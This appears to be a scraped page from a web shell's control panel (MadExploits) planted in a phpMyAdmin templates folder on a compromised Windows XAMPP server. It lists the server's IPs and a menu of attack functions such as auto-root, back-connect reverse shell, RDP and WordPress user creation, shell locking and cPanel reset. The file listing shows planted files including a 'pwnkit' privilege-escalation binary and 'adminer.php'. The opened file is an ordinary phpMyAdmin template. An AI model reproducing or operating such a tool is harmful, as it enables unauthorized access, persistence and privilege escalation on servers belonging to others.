Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.179
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
table /
insert /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
actions_panel.twig
2.71
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
column_row.twig
9.12
KB
-rw-rw-rw-
continue_insertion_form.twig
817
B
-rw-rw-rw-
get_head_and_foot_of_insert_ro...
510
B
-rw-rw-rw-
get_html_for_insert_edit_form_...
210
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : continue_insertion_form.twig
<form id="continueForm" method="post" action="{{ url('/table/replace') }}" name="continueForm"> {{ get_hidden_inputs(db, table) }} <input type="hidden" name="goto" value="{{ goto }}"> <input type="hidden" name="err_url" value="{{ err_url }}"> <input type="hidden" name="sql_query" value="{{ sql_query }}"> {% if has_where_clause %} {% for key_id, where_clause in where_clause_array %} <input type="hidden" name="where_clause[{{ key_id }}]" value=" {{- where_clause|trim }}"> {% endfor %} {% endif %} {% set insert_rows %} <input type="number" name="insert_rows" id="insert_rows" value=" {{- insert_rows_default }}" min="1"> {% endset %} {{ 'Continue insertion with %s rows'|trans|format(insert_rows)|raw }} </form>
Close